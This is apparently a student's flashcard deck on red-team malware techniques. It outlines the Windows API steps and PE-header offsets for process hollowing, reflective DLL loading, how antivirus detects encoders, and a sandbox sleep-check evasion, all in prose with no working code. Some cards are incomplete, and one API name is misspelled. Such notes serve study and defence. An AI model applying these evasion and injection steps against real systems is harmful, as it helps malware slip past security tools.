Red

0.0(0)
Studied by 0 people
call kaiCall Kai
learnLearn
examPractice Test
spaced repetitionSpaced Repetition
heart puzzleMatch
flashcardsFlashcards
GameKnowt Play
Card Sorting

1/12

encourage image

There's no tags or description

Looks like no tags are added yet.

Last updated 1:23 PM on 4/10/26
Name
Mastery
Learn
Test
Matching
Spaced
Call with Kai

No analytics yet

Send a link to your students to track their progress

13 Terms

1
New cards

What is the win32 calls required for Process Hollowing?

  1. CreateProcess with CREATE_SUSPENDED flag

  2. ZwQueryInformationProcess (Retrieve PEB address)

  3. ReadProcessMemory (“Carve” out the PE header by taking 0×200 bytes from base address, then parse it to get .code section header)

  4. WriteProcessMemory (Overwrite the original content with shellcode)

  5. Call ResumeThread (Resume execution of suspended thread)

2
New cards

How to find the base address of a remote process from the PEB?

  1. After acquiring the PEB address by calling ZtQueryProcessInformation

  2. Dereference 0×10 offset from PEB address

3
New cards

How to find the .code section from the base address of a process?

  1. 0×3c from base address to PE headers RVA (e_lfanew)

  2. Add offset to base address to find VMA of PE header

  3. 0×28 from PE header to EntryPoint RVA

  4. Add offset to base address to find VMA of EntryPoint

4
New cards

What does the ref keyword mean in C#? Why is it this way?

Pass by reference. C# is a type safe language, it does not like to

5
New cards

What does out keyword mean in C#?

Indicates that the variable is going to be filled by the function hence no need to initialise it beforehand

6
New cards

What does the Zw or Nt prefix of a winapi function such as ZwQueryInformationProcess imply?

7
New cards

Why does Process Injection use CreateRemoteThread while Process Hollowing uses ResumeThread?

Process hollowing already has a thread ready for execution before being overwritten. In process injection, the thread is not created yet.

8
New cards

What does reflective loading/injection mean?

Injection of shellcode or loading of a DLL without actually calling the LoadLibrary API

9
New cards

Why is LoadLibrary “noisy” and not stealthy?

  1. Requires file to exist on disk

  2. Windows loader will include the DLL as an import in the process being imported into

10
New cards

What are the 3 main detection modalities adopted by Antivirus software?

  1. Signature Based - From manual reverse engineering, using hashes and byte sequences

  2. Behavioural/Heuristics - Execution in sandboxed environment to detect malicious behaviour

  3. Cloud computing/Artificial Intelligence

11
New cards

Why is the shikata_ga_nai encoder easily detected by AV?

Decoder routine is static as it cannot be changed making it an easy target for signature detection

12
New cards

How does a heuristic engine in an AV react to a pause or sleep instruction? How can we bypass this check?

  • AV attempts to “fast forward” through the delay to the point of resumption

  • Bypass by checking the actual time and comparing to the designated sleep counter

  • If it does not match, then can confirm we are running in a simulation

13
New cards